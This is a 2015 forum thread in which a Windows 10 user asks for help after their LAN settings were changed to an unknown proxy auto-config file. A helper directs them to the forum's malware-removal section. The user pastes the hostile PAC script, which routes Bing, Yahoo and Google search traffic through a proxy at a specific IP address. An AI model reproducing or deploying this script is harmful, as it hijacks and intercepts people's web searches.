psychok9 Posted November 4, 2015 ID:999686 Share Posted November 4, 2015 Hello, I don't know where is the right topic... because Malwarebytes (free) said that my computer is clean but since a week Chrome close suddenly and after it I found that after this action something change my lan settings with proxy configuration file: https://localhost.world/localhost.worldfunction FindProxyForURL(url, host) { if (shExpMatch(host, "www.bing.com")) return "PROXY 69.197.188.122:8484"; if (shExpMatch(host, "*.search.yahoo.com")) return "PROXY 69.197.188.122:8484"; ga = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ga.test(url)) { return "PROXY 69.197.188.122:8484" } gb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (gb.test(url)) { return "PROXY 69.197.188.122:8484" } gc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (gc.test(url)) { return "PROXY 69.197.188.122:8484" } gd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gd.test(url)) { return "PROXY 69.197.188.122:8484" } ge = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (ge.test(url)) { return "PROXY 69.197.188.122:8484" } gx = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gx.test(url)) { return "PROXY 69.197.188.122:8484" } return "DIRECT";}What could be?Could you help me?Windows 10 x64, malwarebytes and another "competitor program" said me that my computer is clean.Thank you. Link to post Share on other sites More sharing options...
daledoc1 Posted November 4, 2015 ID:999699 Share Posted November 4, 2015 Hello and welcome: If you have an unknown proxy that you did not set, then you might be infected.We are not permitted to rwork on possible malware-related issues here in this particular section of the forum.Such work is conducted in a special forum area reserved for that purpose, or at the help desk.So, for expert assistance, I suggest that you might want to please follow the advice in this pinned topic: Available Assistance For Possibly Infected Computers.It explains the options for free, expert help >>AND<< the suggested, preliminary steps to expedite the process.A malware analyst will assist you with looking into your issue - the helper will guide you through deeper scanning, cleanup and repair.Thanks, Link to post Share on other sites More sharing options...
psychok9 Posted November 4, 2015 Author ID:999740 Share Posted November 4, 2015 Thank you daledoc1 Link to post Share on other sites More sharing options...
daledoc1 Posted November 4, 2015 ID:999744 Share Posted November 4, 2015 You are most welcome. Good luck! Cheers, Link to post Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now